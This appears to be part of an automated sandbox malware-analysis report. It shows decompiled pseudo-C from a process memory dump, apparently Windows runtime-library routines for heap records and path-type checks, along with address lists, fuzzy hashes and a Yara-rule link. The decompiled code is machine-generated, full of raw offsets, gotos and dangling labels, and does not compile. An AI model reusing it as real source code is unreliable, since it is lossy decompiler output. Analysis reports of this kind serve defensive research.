														E0463F3E0(_t167, _t528 - 0x68,  *(_t528 - 0x98));
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + (_t508 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t380 =  *(_t528 - 0x80);
														__eflags = _t380;
														if(_t380 != 0) {
															_t173 = _t380 + 4;
															 *_t173 =  *(_t380 + 4) | 1;
															__eflags =  *_t173;
														}
														_t454 = _t524;
														 *(_t528 - 0x80) = _t454;
														_t327 = 1;
														__eflags = 1;
													}
													__eflags =  *(_t528 - 0xd4);
													if( *(_t528 - 0xd4) == 0) {
														_t505 =  *(_t528 - 0x80);
													} else {
														_t505 = _t479 + _t427;
														_t523 = 0x10;
														 *_t505 = _t523;
														_t367 = 3;
														 *((short*)(_t505 + 2)) = _t367;
														_t368 = 4;
														 *((short*)(_t505 + 6)) = _t368;
														 *(_t505 + 4) = 0;
														 *((intOrPtr*)(_t505 + 8)) =  *((intOrPtr*)( *[fs:0x30] + 0x1d4));
														_t327 = 1;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 = _t479 + _t523;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t454;
														if(_t454 != 0) {
															_t186 = _t454 + 4;
															 *_t186 =  *(_t454 + 4) | 1;
															__eflags =  *_t186;
														}
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0x7a) - _t327;
													if( *(_t528 - 0x7a) == _t327) {
														 *(_t528 - 0xd4) = _t479 + _t427;
														_t522 =  *(_t528 - 0x84) & 0x0000ffff;
														E0463F3E0(_t479 + _t427,  *(_t528 - 0x9c), _t522);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + _t522;
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t199 = _t505 + 4;
															 *_t199 =  *(_t505 + 4) | 1;
															__eflags =  *_t199;
														}
														_t505 =  *(_t528 - 0xd4);
														 *(_t528 - 0x80) = _t505;
													}
													__eflags =  *(_t528 - 0xa8);
													if( *(_t528 - 0xa8) != 0) {
														_t356 = _t479 + _t427;
														 *(_t528 - 0xd4) = _t356;
														_t462 =  *(_t528 - 0xac);
														 *_t356 = _t462 + 0x0000000f & 0x0000fff8;
														_t485 = 0xc;
														 *((short*)(_t356 + 2)) = _t485;
														 *(_t356 + 6) = _t462;
														 *((short*)(_t356 + 4)) = 0;
														_t211 = _t356 + 8; // 0x9
														E0463F3E0(_t211,  *(_t528 - 0xa8), _t462 & 0x0000ffff);
														E0463FA60((_t462 & 0x0000ffff) + _t211, 0, (_t462 + 0x0000000f & 0x0000fff8) -  *(_t528 - 0xac) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0x18;
														_t427 =  *(_t528 - 0x88);
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t505 =  *(_t528 - 0xd4);
														_t479 =  *(_t528 - 0x78) + ( *_t505 & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														_t362 =  *(_t528 - 0x80);
														__eflags = _t362;
														if(_t362 != 0) {
															_t222 = _t362 + 4;
															 *_t222 =  *(_t362 + 4) | 1;
															__eflags =  *_t222;
														}
													}
													__eflags =  *(_t528 - 0xb0);
													if( *(_t528 - 0xb0) != 0) {
														 *(_t479 + _t427) =  *(_t528 - 0x90) + 0x0000000f & 0x0000fff8;
														_t458 = 0xb;
														 *((short*)(_t479 + _t427 + 2)) = _t458;
														 *((short*)(_t479 + _t427 + 6)) =  *(_t528 - 0x90);
														 *((short*)(_t427 + 4 + _t479)) = 0;
														 *(_t528 - 0xb8) = _t479 + 8 + _t427;
														E0463FA60(( *(_t528 - 0x90) & 0x0000ffff) + _t479 + 8 + _t427, 0, ( *(_t528 - 0x90) + 0x0000000f & 0x0000fff8) -  *(_t528 - 0x90) - 0x00000008 & 0x0000ffff);
														_t529 = _t529 + 0xc;
														 *(_t427 + 4) =  *(_t427 + 4) | 1;
														_t479 =  *(_t528 - 0x78) + ( *( *(_t528 - 0x78) + _t427) & 0x0000ffff);
														 *(_t528 - 0x78) = _t479;
														__eflags = _t505;
														if(_t505 != 0) {
															_t241 = _t505 + 4;
															 *_t241 =  *(_t505 + 4) | 1;
															__eflags =  *_t241;
														}
													}
													_t328 =  *(_t528 + 0x1c);
													__eflags = _t328;
													if(_t328 == 0) {
														L87:
														_t329 =  *((intOrPtr*)(_t528 - 0xe0));
														 *((intOrPtr*)(_t427 + 0x10)) = _t329;
														_t455 =  *(_t528 - 0xdc);
														 *(_t427 + 0x14) = _t455;
														_t480 =  *(_t528 - 0xa0);
														_t517 = 3;
														__eflags =  *((intOrPtr*)(_t480 + 0x10)) - _t517;
														if( *((intOrPtr*)(_t480 + 0x10)) != _t517) {
															asm("rdtsc");
															 *(_t427 + 0x3c) = _t480;
														} else {
															 *(_t427 + 0x3c) = _t455;
														}
														 *((intOrPtr*)(_t427 + 0x38)) = _t329;
														_t456 =  *[fs:0x18];
														 *((intOrPtr*)(_t427 + 8)) =  *((intOrPtr*)(_t456 + 0x24));
														 *((intOrPtr*)(_t427 + 0xc)) =  *((intOrPtr*)(_t456 + 0x20));
														_t427 = 0;
														__eflags = 0;
														_t511 = 0x18;
														goto L91;
													} else {
														_t519 =  *((intOrPtr*)(_t528 - 0xc8)) + 0xc;
														__eflags = _t519;
														 *(_t528 - 0x8c) = _t328;
														do {
															_t506 =  *((intOrPtr*)(_t519 - 4));
															_t457 =  *((intOrPtr*)(_t519 - 0xc));
															 *(_t528 - 0xd4) =  *(_t519 - 8);
															_t333 =  *((intOrPtr*)(_t528 - 0xb4));
															__eflags =  *(_t333 + 0x36) & 0x00004000;
															if(( *(_t333 + 0x36) & 0x00004000) != 0) {
																_t334 =  *_t519;
															} else {
																_t334 = 0;
															}
															_t336 = _t334 & 0x000000ff;
															__eflags = _t336;
															_t427 =  *(_t528 - 0x88);
															if(_t336 == 0) {
																_t481 = _t479 + _t506;
																__eflags = _t481;
																 *(_t528 - 0x78) = _t481;
																E0463F3E0(_t479 + _t427, _t457, _t506);
																_t529 = _t529 + 0xc;
															} else {
																_t340 = _t336 - 1;
																__eflags = _t340;
																if(_t340 == 0) {
																	E0463F3E0( *(_t528 - 0xb8), _t457, _t506);
																	_t529 = _t529 + 0xc;
																	 *(_t528 - 0xb8) =  *(_t528 - 0xb8) + _t506;
																} else {
																	__eflags = _t340 == 0;
																	if(_t340 == 0) {
																		__eflags = _t506 - 8;
																		if(_t506 == 8) {
																			 *((intOrPtr*)(_t528 - 0xe0)) =  *_t457;
																			 *(_t528 - 0xdc) =  *(_t457 + 4);
																		}
																	}
																}
															}
															_t339 = 0x10;
															_t519 = _t519 + _t339;
															_t263 = _t528 - 0x8c;
															 *_t263 =  *(_t528 - 0x8c) - 1;
															__eflags =  *_t263;
															_t479 =  *(_t528 - 0x78);
														} while ( *_t263 != 0);
														goto L87;
													}
												}
											} else {
												_t392 =  *( *((intOrPtr*)(_t528 - 0xb4)) + 0x36) & 0x00004000;
												 *(_t528 - 0xa2) = _t392;
												_t469 =  *((intOrPtr*)(_t528 - 0xc8)) + 8;
												__eflags = _t469;
												while(1) {
													 *(_t528 - 0xe4) = _t511;
													__eflags = _t392;
													_t393 = _t427;
													if(_t392 != 0) {
														_t393 =  *((intOrPtr*)(_t469 + 4));
													}
													_t395 = (_t393 & 0x000000ff) - _t427;
													__eflags = _t395;
													if(_t395 == 0) {
														_t511 = _t511 +  *_t469;
														__eflags = _t511;
													} else {
														_t398 = _t395 - 1;
														__eflags = _t398;
														if(_t398 == 0) {
															 *(_t528 - 0x90) =  *(_t528 - 0x90) +  *_t469;
															 *(_t528 - 0xb0) =  *(_t528 - 0xb0) + 1;
														} else {
															__eflags = _t398 == 1;
															if(_t398 == 1) {
																 *(_t528 - 0xa8) =  *(_t469 - 8);
																_t402 =  *_t469 & 0x0000ffff;
																 *(_t528 - 0xac) = _t402;
																_t511 = _t511 + ((_t402 & 0x0000ffff) + 0x0000000f & 0xfffffff8);
															}
														}
													}
													__eflags = _t511 -  *(_t528 - 0xe4);
													if(_t511 <  *(_t528 - 0xe4)) {
														break;
													}
													_t397 =  *(_t528 - 0x88) + 1;
													 *(_t528 - 0x88) = _t397;
													_t469 = _t469 + 0x10;
													__eflags = _t397 -  *(_t528 + 0x1c);
													_t392 =  *(_t528 - 0xa2);
													if(_t397 <  *(_t528 + 0x1c)) {
														continue;
													}
													goto L45;
												}
												_t475 = 0x216;
												 *(_t528 - 0x74) = 0x216;
												goto L45;
											}
										} else {
											asm("lock dec dword [eax+ecx*8+0x4]");
											goto L16;
										}
									}
									_t491 = E046C4CAB(_t306, _t528 - 0xa4);
									 *(_t528 - 0x74) = _t491;
									__eflags = _t491;
									if(_t491 != 0) {
										goto L91;
									} else {
										_t474 =  *((intOrPtr*)(_t528 - 0x94));
										goto L20;
									}
								}
								L16:
								 *(_t528 - 0x74) = 0x1069;
								L93:
								_t298 =  *(_t528 - 0xd0) + 1;
								 *(_t528 - 0xd0) = _t298;
								_t474 = _t474 + _t511;
								 *((intOrPtr*)(_t528 - 0x94)) = _t474;
								_t494 = 4;
								__eflags = _t298 - _t494;
								if(_t298 >= _t494) {
									goto L100;
								}
								_t494 =  *(_t528 - 0xcc);
								_t435 = _t298;
								continue;
							}
							__eflags = _t494[2] | _t494[3];
							if((_t494[2] | _t494[3]) == 0) {
								goto L15;
							}
							goto L12;
						}
						__eflags = _t301;
						if(_t301 != 0) {
							goto L92;
						}
						goto L10;
						L92:
						goto L93;
					}
				} else {
					_push(0x57);
					L101:
					return E0464D130(_t427, _t494, _t511);
				}
			}

0x046c5ba5
0x046c5baa
0x046c5baf
0x046c5bb4
0x046c5bb6
0x046c5bbc
0x046c5bbe
0x046c5bc4
0x046c5bcd
0x046c5bd3
0x046c5bd6
0x046c5bdc
0x046c5be0
0x046c5be3
0x046c5beb
0x046c5bf2
0x046c5bf8
0x046c5bfe
0x046c5c04
0x046c5c0e
0x046c5c18
0x046c5c1f
0x046c5c25
0x046c5c2a
0x046c5c2c
0x046c5c32
0x046c5c3a
0x046c5c3f
0x046c5c42
0x046c5c48
0x046c5c5b
0x046c5c5b
0x046c5c2c
0x046c5cb7
0x046c5cb9
0x046c5cbf
0x046c5cc2
0x046c5cca
0x046c5ccb
0x046c5ccb
0x046c5cd1
0x046c5cd7
0x046c5cda
0x046c5ce1
0x046c5ce4
0x046c5ce7
0x046c5ced
0x046c5cf3
0x046c5cf9
0x046c5cff
0x046c5d08
0x046c5d0a
0x046c5d0e
0x046c5d10
0x00000000
0x00000000
0x046c5d16
0x046c5d1a
0x00000000
0x00000000
0x046c5d20
0x046c5d22
0x046c5d25
0x046c5d2f
0x046c5d2f
0x046c5d33
0x046c5d3d
0x046c5d49
0x046c5d4b
0x00000000
0x00000000
0x046c5d5a
0x046c5d5d
0x046c5d60
0x00000000
0x00000000
0x046c5d66
0x046c5d69
0x00000000
0x00000000
0x046c5d6f
0x046c5d6f
0x046c5d73
0x046c5d79
0x046c5d7f
0x046c5d86
0x046c5d95
0x046c5d98
0x046c5dba
0x046c5dcb
0x046c5dce
0x046c5dd3
0x046c5dd6
0x046c5dd8
0x046c5de6
0x046c5dec
0x046c5dee
0x046c5df1
0x046c5df3
0x046c635a
0x046c635a
0x00000000
0x046c635a
0x046c5dfe
0x046c5e02
0x046c5e05
0x046c5e07
0x046c5e10
0x046c5e13
0x046c5e1b
0x046c5e1c
0x046c5e21
0x046c5e22
0x046c5e23
0x046c5e25
0x046c5e2a
0x046c5e2c
0x046c5e2e
0x046c5e36
0x046c5e39
0x046c5e42
0x046c5e47
0x046c5e4d
0x046c5e54
0x046c5e54
0x046c5e54
0x046c5e2e
0x046c5e5c
0x046c5e5f
0x046c5e62
0x046c5e64
0x046c5e6b
0x046c5e70
0x046c5e7a
0x046c5e7a
0x046c5e7a
0x046c5e6b
0x046c5e7e
0x046c5e7f
0x046c5e7f
0x046c5e81
0x046c5e87
0x046c5e8b
0x046c5e8c
0x046c5e8c
0x046c5e8c
0x046c5e9a
0x046c5e9c
0x046c5ea2
0x046c5ea6
0x046c5f50
0x046c5f50
0x046c5f57
0x046c5f66
0x046c5f66
0x046c5f66
0x046c5f68
0x046c5f6a
0x046c63d0
0x00000000
0x046c5f70
0x046c5f70
0x046c5f91
0x046c5f9c
0x046c5f9e
0x046c5fa4
0x046c5fa6
0x046c638c
0x046c6392
0x046c63a1
0x046c63a7
0x046c63af
0x046c63af
0x046c63bd
0x046c63d8
0x00000000
0x046c63d8
0x046c5fac
0x046c5fb2
0x046c5fb4
0x046c5fbd
0x046c5fc6
0x046c5fce
0x046c5fd4
0x046c5fdc
0x046c5fec
0x046c5fed
0x046c5fee
0x046c5fef
0x046c5ff9
0x046c5ffa
0x046c5ffb
0x046c5ffc
0x046c6000
0x046c6004
0x046c6012
0x046c6012
0x046c6018
0x046c6019
0x046c601a
0x046c601b
0x046c601c
0x046c6020
0x046c6059
0x046c605c
0x046c6061
0x046c6061
0x046c6022
0x046c6022
0x046c6022
0x046c6025
0x046c602a
0x046c602b
0x046c6031
0x046c6037
0x046c6038
0x046c603e
0x046c6048
0x046c6049
0x046c604a
0x046c604b
0x046c604c
0x046c604d
0x046c6053
0x046c6054
0x046c6054
0x046c6062
0x046c6065
0x046c6067
0x046c606a
0x046c6070
0x046c6075
0x046c6076
0x046c6081
0x046c6087
0x046c6095
0x046c6099
0x046c609e
0x046c60a4
0x046c60ae
0x046c60b0
0x046c60b3
0x046c60b6
0x046c60b8
0x046c60ba
0x046c60ba
0x046c60ba
0x046c60ba
0x046c60be
0x046c60c0
0x046c60c5
0x046c60c5
0x046c60c5
0x046c60c6
0x046c60cd
0x046c6114
0x046c60cf
0x046c60cf
0x046c60d4
0x046c60d5
0x046c60da
0x046c60db
0x046c60e1
0x046c60e2
0x046c60e8
0x046c60f8
0x046c60fd
0x046c60fe
0x046c6102
0x046c6104
0x046c6107
0x046c6109
0x046c610b
0x046c610b
0x046c610b
0x046c610b
0x046c610f
0x046c610f
0x046c6117
0x046c611a
0x046c611f
0x046c6125
0x046c6134
0x046c6139
0x046c613f
0x046c6146
0x046c6148
0x046c614b
0x046c614d
0x046c614f
0x046c614f
0x046c614f
0x046c614f
0x046c6153
0x046c6159
0x046c6159
0x046c615c
0x046c6163
0x046c6169
0x046c616c
0x046c6172
0x046c6181
0x046c6186
0x046c6187
0x046c618b
0x046c6191
0x046c6195
0x046c61a3
0x046c61bb
0x046c61c0
0x046c61c3
0x046c61cc
0x046c61d0
0x046c61dc
0x046c61de
0x046c61e1
0x046c61e4
0x046c61e6
0x046c61e8
0x046c61e8
0x046c61e8
0x046c61e8
0x046c61e6
0x046c61ec
0x046c61f3
0x046c6203
0x046c6209
0x046c620a
0x046c6216
0x046c621d
0x046c6227
0x046c6241
0x046c6246
0x046c624c
0x046c6257
0x046c6259
0x046c625c
0x046c625e
0x046c6260
0x046c6260
0x046c6260
0x046c6260
0x046c625e
0x046c6264
0x046c6267
0x046c6269
0x046c6315
0x046c6315
0x046c631b
0x046c631e
0x046c6324
0x046c6327
0x046c632f
0x046c6330
0x046c6333
0x046c633a
0x046c633c
0x046c6335
0x046c6335
0x046c6335
0x046c633f
0x046c6342
0x046c634c
0x046c6352
0x046c6355
0x046c6355
0x046c6359
0x00000000
0x046c626f
0x046c6275
0x046c6275
0x046c6278
0x046c627e
0x046c627e
0x046c6281
0x046c6287
0x046c628d
0x046c6298
0x046c629c
0x046c62a2
0x046c629e
0x046c629e
0x046c629e
0x046c62a7
0x046c62a7
0x046c62aa
0x046c62b0
0x046c62f0
0x046c62f0
0x046c62f2
0x046c62f8
0x046c62fd
0x046c62b2
0x046c62b2
0x046c62b2
0x046c62b5
0x046c62dd
0x046c62e2
0x046c62e5
0x046c62b7
0x046c62b8
0x046c62bb
0x046c62bd
0x046c62c0
0x046c62c4
0x046c62cd
0x046c62cd
0x046c62c0
0x046c62bb
0x046c62b5
0x046c6302
0x046c6303
0x046c6305
0x046c6305
0x046c6305
0x046c630c
0x046c630c
0x00000000
0x046c627e
0x046c6269
0x046c5eac
0x046c5ebb
0x046c5ebe
0x046c5ecb
0x046c5ecb
0x046c5ece
0x046c5ece
0x046c5ed4
0x046c5ed7
0x046c5ed9
0x046c5edb
0x046c5edb
0x046c5ee1
0x046c5ee1
0x046c5ee3
0x046c5f20
0x046c5f20
0x046c5ee5
0x046c5ee5
0x046c5ee5
0x046c5ee8
0x046c5f11
0x046c5f18
0x046c5eea
0x046c5eea
0x046c5eed
0x046c5ef2
0x046c5ef8
0x046c5efb
0x046c5f0a
0x046c5f0a
0x046c5eed
0x046c5ee8
0x046c5f22
0x046c5f28
0x00000000
0x00000000
0x046c5f30
0x046c5f31
0x046c5f37
0x046c5f3a
0x046c5f3d
0x046c5f44
0x00000000
0x00000000
0x00000000
0x046c5f46
0x046c5f48
0x046c5f4d
0x00000000
0x046c5f4d
0x046c5dda
0x046c5ddf
0x00000000
0x046c5ddf
0x046c5dd8
0x046c5da7
0x046c5da9
0x046c5dac
0x046c5dae
0x00000000
0x046c5db4
0x046c5db4
0x00000000
0x046c5db4
0x046c5dae
0x046c5d88
0x046c5d8d
0x046c6363
0x046c6369
0x046c636a
0x046c6370
0x046c6372
0x046c637a
0x046c637b
0x046c637d
0x00000000
0x00000000
0x046c637f
0x046c6385
0x00000000
0x046c6385
0x046c5d38
0x046c5d3b
0x00000000
0x00000000
0x00000000
0x046c5d3b
0x046c5d27
0x046c5d29
0x00000000
0x00000000
0x00000000
0x046c6360
0x00000000
0x046c6360
0x046c5c10
0x046c5c10
0x046c63da
0x046c63e5
0x046c63e5

Memory Dump Source

Source File: 00000007.00000002.508499448.00000000045D0000.00000040.00000001.sdmp, Offset: 045D0000, based on PE: true

Associated: 00000007.00000002.509039610.00000000046EB000.00000040.00000001.sdmp Download File
Associated: 00000007.00000002.509063992.00000000046EF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62babc3ccd878c564220b3c625e055a72098f0cffd459fbea0bed391f45c7e15
Instruction ID: 4ad5da3e96689847a72600fa838c21f23186ec5dd57e71ed6b8ae7195e76335f
Opcode Fuzzy Hash: 62babc3ccd878c564220b3c625e055a72098f0cffd459fbea0bed391f45c7e15
Instruction Fuzzy Hash: 45424B75A00269DFDB24CF68C880BA9B7B1FF55304F1481AED94DAB341E734A985CF94

Uniqueness

Uniqueness Score: -1.00%

Function 04614120, Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E04614120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x46ed360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0462F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E04616E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L04614620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E04616E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M046145F8))) {
												case 0:
													_v568 = 0x45d1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x45d11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L04614620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0463F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0463F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E045F52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E0460EB70(1, 0x46e79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E0460AA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E046395D0();
																			L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L046177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0463B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E04633D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0463B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x04614128
0x04614135
0x0461413c
0x04614141
0x04614145
0x04614147
0x0461414e
0x04614151
0x04614159
0x0461415c
0x04614160
0x04614164
0x04614168
0x0461416c
0x0461417f
0x04614181
0x0461446a
0x0461446a
0x0461418c
0x04614195
0x04614199
0x04614432
0x04614439
0x0461443d
